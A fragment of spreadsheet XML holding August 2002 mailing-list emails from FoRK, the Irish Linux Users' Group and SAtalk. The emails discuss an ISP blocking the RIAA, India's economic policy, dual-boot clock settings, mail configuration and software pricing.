    <t>[URL]http://www.informationwave.net[/URL]   IWT Bans RIAA From Accessing Its Network August 19, 2002 Information Wave Technologies has announced it will actively deny the Recording Industry Association of America (RIAA) from accessing the contents of its network. Earlier this year, the RIAA announced its new plan to access computers without owner's consent for the sake of protecting its assets. Information Wave believes this policy puts its customers at risk of unintentional damage, corporate espionage, and invasion of privacy to say the least. Due to the nature of this matter and RIAA's previous history, we feel the RIAA will abuse software vulnerabilities in a client's browser after the browser accesses its site, potentially allowing the RIAA to access and/or tamper with your data. Starting at midnight on August 19, 2002, Information Wave customers will no longer be able to reach the RIAA's web site. Information Wave will also actively seek out attempts by the RIAA to thwart this policy and apply additional filters to protect our customers' data. Information Wave will also deploy peer-to-peer clients on the Gnutella network from its security research and development network (honeynet) which will offer files with popular song titles derived from the Billboard Top 100 maintained by VNU eMedia. No copyright violations will take place, these files will merely have arbitrary sizes similar to the length of a 3 to 4 minute MP3 audio file encoded at 128kbps. Clients which connect to our peer-to-peer clients, and then afterwards attempt to illegally access the network will be immediately blacklisted from Information Wave's network. The data collected will be actively maintained and distributed from our network operations site. The placement of this policy is not intended to hamper the RIAA's piracy elimination agenda or advocate Internet piracy, but to ensure the safety of our customers' data attached to our network from hackers or corporate espionage hidden by the veil of RIAA copyright enforcement. If you have questions, comments, or concerns regarding this policy, please e-mail riaa@informationwave.ne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URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.informationwave.net http://xent.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Ian Andrew Bell &lt;fork@ianbell.com&gt;\nDate: Tue, 20 Aug 2002 15:34:18 -0700</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 15:34:18 -0700</t>
  </si>
  <si>
    <t>I think that this and other articles confuse Socialism with \nBureaucracy.  Libertarianism as implemented in North America is not \nexactly the shining pinnacle of economic efficiency.\n\nJust try starting a telephone company in the US or (even worse) \nCanada.  It can take a year or more to get the blessing of our own \n"Permit Rajs" at the FCC, PUC, and PTTs (or, in the decidedly more \nsocialist leaning Canada, Industry Canada and the CRTC).\n\nYet, despite all of this intense regulation and paper pushing, as \nwell as regulatory scrutiny by the FTC, SEC, and IRS, the \nexecutives of Telecom Companies have managed to bilk the investment \ncommunity for what looks to be tens of billions of dollars.  They \nfinished their routine with the a quadruple lutz -- laying off \nhundreds of thousands of workers when it all came crashing down.\n\nSo.. tell me again.. how are we better off?\n\n-Ian.\n\n\nOn Tuesday, August 20, 2002, at 12:09 PM, John Hall wrote:\n\nThe Mystery of Capital: Why Capitalism Triumphs in the West and Fails\nEverywhere Else -- by Hernando De Soto	\n\nIs something I'm reading now.\n\nMy impression is that France is not anywhere near the "Permit Raj"\nnightmare that India is (and became).  Nor has its market been closed\nlike India's has.\n\nBut De Soto's work is perhaps just as important or more so.  He hasn't\ndealt specifically with India, but I recall examples from Peru,\nPhilippines, and Egypt.  In Lima, his team took over a year (I think it\nwas 2) working 8 hr days to legally register a 1 person company.  In the\nPhilippines, getting legal title can take 20 years.  In Egypt, about 80%\nof the population in Cairo lives in places where they are officially\nillegal.\n\nIndia hasn't been helped by its socialism.  Socialism has certainly\nhelped strangle the country in permits.  But perhaps De Soto is right\nthat the real crippling thing is keeping most of the people out of the\nlegal, official property system.\n\nPutting most of the people in the property system was something the west\nonly finished about 100 years ago, or Japan did 50 years ago.  It wasn't\neasy, but we live in a society that doesn't even remember we did it.\n\n\n-----Original Message-----\nFrom: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of\nRobert\nHarley\nSent: Tuesday, August 20, 2002 11:24 AM\nTo: fork@spamassassin.taint.org\nSubject: Re: The Curse of India's Socialism\n\nRAH quoted:\nIndians are not poor because there are too many of them; they are\npoor\nbecause there are too many regulations and too much government\nintervention\n-- even today, a decade after reforms were begun. India's greatest\nproblems\narise from a political culture guided by socialist instincts on the\none\nhand and an imbedded legal obligation on the other hand.\n\nNice theory and all, but s/India/France/g and the statements hold just\nas true, yet France is #12 in the UN's HDI ranking, not #124.\n\n\nSince all parties must stand for socialism, no party espouses\nclassical liberalism\n\nI'm not convinced that that classical liberalism is a good solution\nfor countries in real difficulty.  See Joseph Stiglitz (Nobel for\nEconomics) on the FMI's failed remedies.  Of course googling on\n"Stiglitz FMI" only brings up links in Spanish and French.  I guess\nthat variety of spin is non grata in many anglo circles.\n\n\n[URL]http://xent.com[/URL]\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Anthony &lt;ant@elivefree.net&gt;\nFrom: Liam Bedford &lt;lbedford@lbedford.org&gt;\nDate: Tue, 20 Aug 2002 15:31:17 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 15:31:17 +0100</t>
  </si>
  <si>
    <t>Anthony &lt;ant@elivefree.net&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] hwclock</t>
  </si>
  <si>
    <t>On Tue, Aug 20, 2002 at 03:07:35PM +0100, Anthony wrote:\n&gt; &gt; &gt; In my experience Windows will change the hardware clock the first time\n&gt; &gt; &gt; you boot into it after the clocks have gone forward/back an hour.  This\n&gt; &gt; &gt; will only happen twice a year. How to stop it, I have not checked (I\n&gt; &gt; &gt; just switch the clock back an hour from within windows after such a\n&gt; &gt; &gt; reboot).  Is there a GMT windows timezone?\n&gt; &gt; _x0018_\n&gt; \n&gt; &gt; Start-&gt;Settings-&gt;Control Panel-&gt;Date/Time-&gt;Time Zone tab-&gt; Uncheck\n&gt; &gt; "Automatically adjust clock for daylight saving change".\n&gt; &gt; \n&gt; \n&gt; Ah, that's grand. I knew about that aspect and had already unchecked the\n&gt; appropriate box. I was just worried that Windows was engaging in\n&gt; undocumented behaviour that I didn't know about.\n&gt; \nwell, it changes the time then, and then leaves it alone.\n\nHowever, Windows expects the time in the RTC to be local time. Linux\ncan be configured to do either this, or to have the RTC at UTC,\nand then use /etc/localtime to figure out the right timezone.\n\nDepending on how you've set it up, this may be a problem (with one\nor other of the OS's one hour out). OS-X also does this silliness :(\n\n(RTC should always have UTC, that way different people can set their\nown timezone on the machine... though I suppose that only applies\nto multi-user machines).\n\nL.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;johnhall@evergo.net&gt;\nFrom: Ian Andrew Bell &lt;hello@ianbell.com&gt;\nDate: Tue, 20 Aug 2002 15:01:36 -0700</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 15:01:36 -0700</t>
  </si>
  <si>
    <t>&lt;johnhall@evergo.net&gt;</t>
  </si>
  <si>
    <t>I think that this and other articles confuse Socialism with \nBureaucracy.  Libertarianism as implemented in North America is not \nexactly the shining pinnacle of economic efficiency.\n\nJust try starting a telephone company in the US or (even worse) \nCanada.  It can take a year or more to get the blessing of our own \n"Permit Rajs" at the FCC, PUC, and PTTs (or, in the decidedly more \nsocialist leaning Canada, Industry Canada and the CRTC).\n\nYet, despite all of this intense regulation and paper pushing, as \nwell as regulatory scrutiny by the FTC, SEC, and IRS, the \nexecutives of Telecom Companies have managed to bilk the investment \ncommunity for what looks to be tens of billions of dollars.  They \nfinished their routine with the a quadruple lutz -- laying off \nhundreds of thousands of workers when it all came crashing down.\n\nSo.. tell me again.. how are we better off?\n\n-Ian.\n\n\nOn Tuesday, August 20, 2002, at 12:09 PM, John Hall wrote:\n\n&gt; The Mystery of Capital: Why Capitalism Triumphs in the West and Fails\n&gt; Everywhere Else -- by Hernando De Soto	\n&gt;\n&gt; Is something I'm reading now.\n&gt;\n&gt; My impression is that France is not anywhere near the "Permit Raj"\n&gt; nightmare that India is (and became).  Nor has its market been closed\n&gt; like India's has.\n&gt;\n&gt; But De Soto's work is perhaps just as important or more so.  He hasn't\n&gt; dealt specifically with India, but I recall examples from Peru,\n&gt; Philippines, and Egypt.  In Lima, his team took over a year (I think it\n&gt; was 2) working 8 hr days to legally register a 1 person company.  \n&gt; In the\n&gt; Philippines, getting legal title can take 20 years.  In Egypt, \n&gt; about 80%\n&gt; of the population in Cairo lives in places where they are officially\n&gt; illegal.\n&gt;\n&gt; India hasn't been helped by its socialism.  Socialism has certainly\n&gt; helped strangle the country in permits.  But perhaps De Soto is right\n&gt; that the real crippling thing is keeping most of the people out of the\n&gt; legal, official property system.\n&gt;\n&gt; Putting most of the people in the property system was something \n&gt; the west\n&gt; only finished about 100 years ago, or Japan did 50 years ago.  It \n&gt; wasn't\n&gt; easy, but we live in a society that doesn't even remember we did it.\n&gt;\n&gt;\n&gt;&gt; -----Original Message-----\n&gt;&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of\n&gt; Robert\n&gt;&gt; Harley\n&gt;&gt; Sent: Tuesday, August 20, 2002 11:24 AM\n&gt;&gt; To: fork@spamassassin.taint.org\n&gt;&gt; Subject: Re: The Curse of India's Socialism\n&gt;&gt;\n&gt;&gt; RAH quoted:\n&gt;&gt;&gt; Indians are not poor because there are too many of them; they are\n&gt; poor\n&gt;&gt;&gt; because there are too many regulations and too much government\n&gt;&gt; intervention\n&gt;&gt;&gt; -- even today, a decade after reforms were begun. India's greatest\n&gt;&gt; problems\n&gt;&gt;&gt; arise from a political culture guided by socialist instincts on the\n&gt; one\n&gt;&gt;&gt; hand and an imbedded legal obligation on the other hand.\n&gt;&gt;\n&gt;&gt; Nice theory and all, but s/India/France/g and the statements hold just\n&gt;&gt; as true, yet France is #12 in the UN's HDI ranking, not #124.\n&gt;&gt;\n&gt;&gt;\n&gt;&gt;&gt; Since all parties must stand for socialism, no party espouses\n&gt;&gt;&gt; classical liberalism\n&gt;&gt;\n&gt;&gt; I'm not convinced that that classical liberalism is a good solution\n&gt;&gt; for countries in real difficulty.  See Joseph Stiglitz (Nobel for\n&gt;&gt; Economics) on the FMI's failed remedies.  Of course googling on\n&gt;&gt; "Stiglitz FMI" only brings up links in Spanish and French.  I guess\n&gt;&gt; that variety of spin is non grata in many anglo circles.\n&gt;&gt;\n&gt;&gt;\n&gt;&gt; R\n&gt;&gt; [URL]http://xent.com[/URL]\n&gt;\n&gt; [URL]http://xent.com[/URL]\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://xent.com http://xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Dave Long &lt;dl@silcom.com&gt;\nDate: Tue, 20 Aug 2002 14:16:30 -0700</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 14:16:30 -0700</t>
  </si>
  <si>
    <t>&gt;                                                                   In the\n&gt; Philippines, getting legal title can take 20 years.  In Egypt, about 80%\n&gt; of the population in Cairo lives in places where they are officially\n&gt; illegal.\n\nIf the situation in Egypt is anything\nlike the situation in the Philippines,\nit's because people (due to a strange\ndesire for jobs) squat on land which\nthey don't own.*\n\nFor people to be able to buy their own\nland, capitalism must be healthy, but\nnot triumphant; there need to be too\nmany capitalists, not too few.\n\n(how well off were the major landowners\nin india before independence?)\n\n-Dave\n\n* In the US, we are not so friendly to\nour capitalists: adverse possession is\nonly supposed to take 5 years.\n\n(How much do we owe to our frontiers?\nHeck, in Egypt didn't they pretty much\ninvent geometry a few millenia ago to\nkeep track of their property lines?)\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: CDale &lt;cdale@techmonkeys.net&gt;\nFrom: Michael &lt;mogmios@mlug.missouri.edu&gt;\nDate: Tue, 20 Aug 2002 14:11:34 -0500 (CDT)</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 14:11:34 -0500 (CDT)</t>
  </si>
  <si>
    <t>Michael &lt;mogmios@mlug.missouri.edu&gt;</t>
  </si>
  <si>
    <t>I develop software and my pricing is that I charge the first set of\ncustomers that drive the features included quite a bit, then charge the\nmajority of the customers a small fee, and when I've earned back what I\ninvested (including my hourly wage) then I release that software for free\nand either start working on a newer version (again back to the adding\nfeatures step) or on a new product. If you can't find someone willing to\npay your costs of development then most likely there really isn't a need\nfor the product you're trying to sell and you shouldn't develop it. If you\nhave to resort to free versions with lame ass ads and stuff then that is a\nstrong indication to get a new project IMO.  :)\n\n\n&gt; We were sitting here talking about Opera, and the fact that it's not\n&gt; free anymore (unless you want the scrollypollies), and how that sucked\n&gt; and stuff, and someone said something about nagware, and I\n&gt; misinterpretted it as snag ware, which mainly means, oh yeh, right, I'm\n&gt; gonna buy this -eyeroll- where's someone with a key?  LOL So who is it\n&gt; again who's on this list who's associated with Opera?  Why's the free\n&gt; one using the same LAME idea netzero, etc useD?  I know what kind of\n&gt; costs are involved in creating software like this, and I understand\n&gt; everyone needs to eat, but if someone can get netscape for free, and\n&gt; opera isn't free, then, hmmm...  I imagine this email is going to bring\n&gt; some bricks down on my head, but well, go for it, I gots my helmet.  (:\n&gt; Cindy P.S. GregB, you there?  (:\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Elias Sinderson &lt;elias@cse.ucsc.edu&gt;\nDate: Tue, 20 Aug 2002 14:09:26 -0700</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 14:09:26 -0700</t>
  </si>
  <si>
    <t>Re: IWT Bans RIAA From Accessing Its Network</t>
  </si>
  <si>
    <t>Beautiful, let the information wars begin... I can't wait to see how \nthis evolves... Perhaps the RIAA will seek legislation preventing others \nfrom preventing their access to other networks? I can't see how that \nwould work out though... Yes, very interesting, and quite sad at the \nsame time.\n\nElias\n\n\nR. A. Hettinga wrote:\n\n&gt;[URL]http://www.informationwave.net[/URL] ...\n&gt;\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: sateesh narahari &lt;sati_home@yahoo.com&gt;\nDate: Tue, 20 Aug 2002 12:43:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 12:43:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>All good arguments, except till you realize that majority of indians were poor even before independence.  Sateesh --- "R. A. Hettinga"  wrote: &gt; [URL]http://online.wsj.com[/URL],,SB1029790639190441115,00.html &gt;  &gt;  &gt; The Wall Street Journal &gt;  &gt; August 20, 2002 &gt; COMMENTARY &gt;  &gt; The Curse of India's Socialism &gt;  &gt; By CHRISTOPHER LINGLE &gt;  &gt; In a classic case of deflecting blame for their own &gt; shortcomings, &gt; politicians in India have identified the size of the &gt; population as the &gt; country's biggest problem. This position was stated &gt; in a unanimous &gt; parliamentary resolution passed on the 50th &gt; anniversary of independence. &gt; Half a decade later, it is a belief that still &gt; resonates with many. Yet it &gt; is hard to imagine a more cynical view. If left free &gt; from the extensive &gt; interference of various levels of government, the &gt; energy and creativity of &gt; the Indian people could soon allow them to be among &gt; the richest on earth. &gt;  &gt; Indians are not poor because there are too many of &gt; them; they are poor &gt; because there are too many regulations and too much &gt; government intervention &gt; -- even today, a decade after reforms were begun. &gt; India's greatest problems &gt; arise from a political culture guided by socialist &gt; instincts on the one &gt; hand and an imbedded legal obligation on the other &gt; hand. &gt;  &gt; While India's political culture reflects the beliefs &gt; of its founding &gt; fathers, there is the additional matter of the &gt; modified preamble to its &gt; constitution that specifies: "India is a sovereign, &gt; secular, socialist &gt; republic." It was Indira Gandhi who had the words &gt; "socialist" and "secular" &gt; added in the late 1970s. At the same time, she also &gt; amended the relevant &gt; section in the Representation of Peoples Act to &gt; require that all recognized &gt; and registered parties swear by this preamble. Since &gt; all parties must stand &gt; for socialism, no party espouses classical &gt; liberalism (yet there are &gt; numerous communist parties). &gt;  &gt; While one can appreciate the difficulty of &gt; abandoning ideas with such &gt; honored lineage, the fact that socialism has been &gt; widely discredited and &gt; abandoned in most places should prompt Indians to &gt; reconsider this &gt; commitment. Despite evidence of its failure as an &gt; economic system, many of &gt; the socialists who carry on do so by trying to &gt; proclaim that their dogma &gt; reinforces certain civic virtues. A presumed merit &gt; of socialism is that it &gt; aims to nurture a greater sense of collective &gt; identity by suppressing the &gt; narrow self-interest of individuals. However, this &gt; aspect of socialism lies &gt; at the heart of its failure both as a political tool &gt; as well as the basis &gt; for economic policy. &gt;  &gt; Let's start with the economic failures of socialism. &gt; Most of the grand &gt; experiments have been ignominiously abandoned or &gt; recast in tortured terms &gt; such as the "Third Way" that defer to the importance &gt; of markets and &gt; individual incentives. Unfortunately, it took a &gt; great deal of human &gt; suffering before socialists abandoned their goal of &gt; trying to create an &gt; economic system on the basis of collective goals. &gt;  &gt; Socialist ideologues are impervious to evidence that &gt; their system inspires &gt; even more human misery in the civic realm. This is &gt; because socialism &gt; provides the political mechanism for and legitimacy &gt; by which people &gt; identify as members of groups. While it may suit the &gt; socialist agenda to &gt; create them-and-us scenarios relating to workers and &gt; capitalists or &gt; peasants and urban dwellers, this logic is readily &gt; converted to other types &gt; of divisions. &gt;  &gt; In the case of India, competition for power has &gt; increasingly become &gt; identified with religiosity or ethnicity, as is &gt; evident by the rise of the &gt; Bharatiya Janata Party, supported by radical &gt; Hindutva supporters. As &gt; elsewhere, political parties based on religion are &gt; by their very nature &gt; exclusionary. These narrow concepts of identity work &gt; against nation &gt; building since such a politics forces arrangements &gt; that cannot accommodate &gt; notions of universal values. &gt;  &gt; Socialism also sets the stage for populist promises &gt; of taking from one &gt; group to support another. This variety of political &gt; posturing by the &gt; Congress Party was used to build a coalition of &gt; disaffected minorities. In &gt; turn, the BJP built its power base on a promise to &gt; restore power to Hindus. &gt; And so it is that India's heritage of socialist &gt; ideology provided the &gt; beginnings of a political culture that evolved into &gt; sectarian populism that &gt; has wrought cycles of communal violence. Populism &gt; with its solicitations of &gt; political patronage, whether based upon nationalism &gt; or some other ploy, is &gt; also open to the sort of rampant corruption so &gt; evident in India. &gt;  &gt; At issue in India is nothing less than the role of &gt; the state. Should it be &gt; used as a mechanism to protect the freedom and &gt; rights of individuals? Or &gt; should the state be a vehicle for groups to gain &gt; power? It should be clear &gt; the latter approach would lead to the destruction of &gt; India's democracy &gt; while the former will allow it to survive. &gt;  &gt; It is undeniable that India's public policy guided &gt; by socialism has &gt; promoted divisions that contributed to social &gt; instability and economic &gt; destruction. This dangerous game has only served the &gt; narrow interests of &gt; those who seek to capture or preserve power. That &gt; India is a "socialist" &gt; state, specified in a preamble to the constitution, &gt; makes this binding &gt; commitment evident in the nature of interventionist &gt; policies that have &gt; wrought slower economic growth causing great harm to &gt; the poor and unskilled &gt; who have lost access to economic opportunities. &gt; Socialism also introduced &gt; forces that are destroying India's hard-earned &gt; democracy. A paradigm shift &gt; in the nature of Indian politics is needed so the &gt; state ceases serving as a &gt; mechanism for groups to gain power and instead &gt; becomes an instrument to &gt; secure rights and freedoms for individuals. &gt;  &gt; Mr. Lingle is professor of economics at Universidad &gt; Francisco Marroquin in &gt; Guatemala, and global strategist for &gt; eConoLytics.com. &gt;  &gt;  &gt;  &gt; --  &gt; ----------------- &gt; R. A. Hettinga  &gt; The Internet Bearer Underwriting Corporation &gt;  &gt; 44 Farquhar Street, Boston, MA 02131 USA &gt; "... however it may deserve respect for its &gt; usefulness and antiquity, &gt; [predicting the end of the world] has not been found &gt; agreeable to &gt; experience." -- Edward Gibbon, 'Decline and Fall of &gt; the Roman Empire' &gt; [URL]http://xent.com[/URL] __________________________________________________ Do You Yahoo!? HotJobs - Search Thousands of New Jobs [URL]http://www.hotjobs.com[/URL] [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://online.wsj.com http://xent.com http://www.hotjobs.com http://xent.com</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nDate: Tue, 20 Aug 2002 12:43:46 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 12:43:46 +0100</t>
  </si>
  <si>
    <t>Sound. I'll be there at 7ish so. \n\nCW\n\n-----------\n I've to leave the girlfriend home first. So, I'll be there sometime just\nafter seven.\n\nKate\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Waider" &lt;waider@waider.ie&gt;, "Martin Feeney" &lt;martin@tuatha.org&gt;\nFrom: "Ciaran Mac Lochlainn" &lt;ciaran17@eircom.net&gt;\nDate: Tue, 20 Aug 2002 12:41:53 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 12:41:53 +0100</t>
  </si>
  <si>
    <t>"Ciaran Mac Lochlainn" &lt;ciaran17@eircom.net&gt;</t>
  </si>
  <si>
    <t>"Waider" &lt;waider@waider.ie&gt;, "Martin Feeney" &lt;martin@tuatha.org&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] Mail sent to ILUG</t>
  </si>
  <si>
    <t>Thanks lads,\n\nI didn't mean to criticise/give offence or anything (someone mailed me off\nlist who seemed to think I did) but I was just wondering "if anything could\nbe done" about those messages.\nMaybe it was a stupid question, seeing as I know virtually nothing about\nmailman, listservs, or server side spam filtering, but thanks for answering\nintelligently!\n\nCiaran\n\nWaider elucidated:\n\n&gt; Martin Feeney wrote:\n&gt; | On Tue, 20 Aug 2002 10:14:59 Ciaran Mac Lochlainn wrote:\n&gt; |\n&gt; |&gt; is it really necessary to send these to the list?\n&gt; |\n&gt; |\n&gt; | What's happening is that the scumbag spammers are forging the from\n&gt; | address to be ilug@linux.ie as well, so the notification to them that\n&gt; | their email is being reviewed gets sent back to the from address:\n&gt; | ilug@linux.ie\n&gt; |\n&gt; | Martin.\n&gt; |\n&gt;\n&gt; Not to belabour the point, but noone can legitimately send mail to ilug\n&gt; from ilug@linux.ie, so Mailman should be catching this and stopping it.\n&gt; Not sending confirms or whatever, just dropping the mail on the floor.\n&gt;\n&gt; Cheers,\n&gt; Waider.\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 20 Aug 2002 12:23:04 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 12:23:04 +0100</t>
  </si>
  <si>
    <t>On Tue, Aug 20, 2002 at 12:21:12PM +0100, Wynne, Conor mentioned:\n&gt; Well boyz, whats the story? Its tuesday an all. I've to work late today so\n&gt; what time are we talking about? \n\n I've to leave the girlfriend home first. So, I'll be there sometime just\nafter seven.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nDate: Tue, 20 Aug 2002 12:21:12 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 12:21:12 +0100</t>
  </si>
  <si>
    <t>Well boyz, whats the story? Its tuesday an all. I've to work late today so\nwhat time are we talking about? \n\nCW\n\n-------------------\nOn Wed, Aug 14, 2002 at 09:22:27AM +0100, Wynne, Conor mentioned:\n&gt; When are we going to have a pint? \n\n Tuesday next week. Boars Head, Capel st.\n\nKate\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 20 Aug 2002 12:10:04 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 12:10:04 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] SMTP auth &amp; mutt</t>
  </si>
  <si>
    <t>On Tue, Aug 20, 2002 at 12:06:18PM +0100, Philip Reynolds mentioned:\n&gt; John P. Looney's [valen@tuatha.org] 11 lines of wisdom included:\n&gt; &gt;  OK, Mutt uses sendmail to deliver mail...\n&gt; &gt; \n&gt; &gt;  How can I get it to deliver via a Postfix box with SMTP auth enabled ?\n&gt; \n&gt; Mutt interacts with smtpdaemon or something like that doesn't it?\n&gt; \n&gt; Can mutt interact directly with SMTP server with authentication\n&gt; capabilities? I don't think it can. \n&gt; \n&gt; Surely you can just run a mailserver on your own machine and send\n&gt; mail using it? \n\n Hmm. Yeah, mutt sorta calls the sendmail program directly. But I thought\nit would be very crap if the auth details (username, password) had to be\nhardcoded into the sendmail.cf (and damned if I can work out how to do\nthat anyway).\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Philip Reynolds &lt;phil@redbrick.dcu.ie&gt;\nDate: Tue, 20 Aug 2002 12:06:18 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 12:06:18 +0100</t>
  </si>
  <si>
    <t>John P. Looney's [valen@tuatha.org] 11 lines of wisdom included:\n&gt;  OK, Mutt uses sendmail to deliver mail...\n&gt; \n&gt;  How can I get it to deliver via a Postfix box with SMTP auth enabled ?\n\nMutt interacts with smtpdaemon or something like that doesn't it?\n\nCan mutt interact directly with SMTP server with authentication\ncapabilities? I don't think it can. \n\nSurely you can just run a mailserver on your own machine and send\nmail using it? \n\n-- \n  Philip Reynolds        \n   RFC Networks          tel: 01 8832063\n[URL]www.rfc-networks.ie[/URL]      fax: 01 8832041\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Philip Reynolds &lt;phil@redbrick.dcu.ie&gt;\nDate: Tue, 20 Aug 2002 11:50:05 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 11:50:05 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] postfix</t>
  </si>
  <si>
    <t>hrishy's [hrishys@yahoo.co.uk] 22 lines of wisdom included:\n&gt; Hi All\n&gt; \n&gt; \n&gt; I ahd some users test1 test2 etc.i deleted their\n&gt; mailboxes from /var/mail/test1 etc.now the postfix\n&gt; queue seems to be huge can anybody help what could be\n&gt; wrong\n\nSome logs might be of some help.\n\n1) some output of /var/log/maillog with some relevant error message\n(that could be /var/log/mail.log or some other log depending on your\nconfiguration)\n\n2) the output from ``postconf -n''\n\nOn another note, you did recreate the mailboxes, didn't you?\n\n-- \n  Philip Reynolds        \n   RFC Networks          tel: 01 8832063\n[URL]www.rfc-networks.ie[/URL]      fax: 01 8832041\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: nan\nFrom: Lucas Gonze &lt;lgonze@panix.com&gt;\nDate: Tue, 20 Aug 2002 11:38:16 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 11:38:16 -0400 (EDT)</t>
  </si>
  <si>
    <t>I paid for CuteFTP on my Windows box.  Well worth the money despite there \nbeing free alternatives, no regrets whatsoever.\n\nNow that Mozilla isn't taking X down twice a day I'm unlikely to pay for \nOpera, but if that hadn't happened around the same time I made the switch \nto 100% unix I would have been happy to.\n\n- Lucas\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;\nDate: Tue, 20 Aug 2002 11:16:59 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 11:16:59 +0100</t>
  </si>
  <si>
    <t>RE: [ILUG] linux pthreads problem</t>
  </si>
  <si>
    <t>&gt; Are you using pthread_join(somethread,0);\n&gt; When you are closing off your instanciated thread made from\n&gt; pthread_t*somethread ?\n\nSomething like this might help you out.... \n\nClass la{\n Public:\n	pthread_t*thread;\n	void thread_me(int num)\n	};\n\nla*lala;\n	\ntypedef struct list\n{\n la*w;\n struct list*next;\n}list_struct;\n\nlist_struct*head;\n\nvoid thread_me(int num);\nvoid add_to_list(la*o);\nvoid delete_from_list();\n\nint main(int argc,char**argv)\n{\nint a=1;\n\n lala=new la;\n thread= new pthread_t;\n add_to_list(lala);\n pthread_create(thread,0,&amp;lala.thread_me,&amp;a);\n\n thread= new pthread_t;\n add_to_list(lala);\n pthread_create(thread,0,&amp;lala.thread_me,&amp;a);\n\ndelete_from_linked_list();\nreturn 0;\n};\n\nvoid lala::thread_me(int num)\n{\n printf("lalala");\n pthread_join((*this)-&gt;thread,0);\nreturn;\n};\n\nvoid add_to_list(la*o)\n{\n static list_struct*a;\n a=new list_struct;\n a-&gt;w=o;\n a-&gt;next=head;\n head=a;\nreturn;\n};\n\nvoid delete_from_linked_list()\n{\n list_struct*a;\n\n while(head!=NULL)\n	{\n	 a=head;\n	 head=head-&gt;next;\n 	 delete a;\n	};\n return;\n};\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org (Justin Mason)\nFrom: "Craig R.Hughes" &lt;craig@deersoft.com&gt;\nDate: Tue, 20 Aug 2002 11:14:50 -0700</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 11:14:50 -0700</t>
  </si>
  <si>
    <t>Re: [SAtalk] results for giant mass-check (phew)</t>
  </si>
  <si>
